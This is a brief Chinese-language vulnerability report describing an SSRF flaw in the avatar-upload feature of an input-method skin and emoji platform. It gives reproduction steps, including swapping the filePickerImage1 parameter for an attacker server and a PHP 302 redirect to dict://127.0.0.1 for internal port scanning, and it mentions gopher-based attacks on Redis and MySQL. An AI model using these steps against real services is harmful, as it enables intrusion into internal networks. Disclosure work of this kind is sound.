某狗输入法皮肤表情开放平台存在 SSRF 漏洞

adopi

某狗输入法皮肤表情开放平台存在 SSRF 漏洞可造成：1.内外网的端口
和服务扫描 2.攻击运行在内网或本地的 redis 或者应用程序 3.攻击内
网的 web 应用

点击头像进入个人中心，上传头像后点击保存，抓包

修改 filePickerImage1 参数为服务器 ip 即可收到请求

可以绕过 waf 探测内网端口，或者利用 gopher 协议攻击内网应用，以
探测端口为例，在自己的 vps 上搭建 302.php，内容为：

1. <?php
   
2. header("Location: dict://127.0.0.1:80",true,302);
   
3. exit();
   
4. ?>

复制代码

访问 302.php，当内网端口开放时，返回 status 为 0

修改 302.php 中端口为不存在的端口时

1. <?php
   
2. header("Location: dict://127.0.0.1:81",true,302);
   
3. exit();
   
4. ?>

复制代码

返回 status 为 10

由此可判断内网80端口开放，可使用gopher协议探测并攻击内网应用，
例如 redis，mysql 等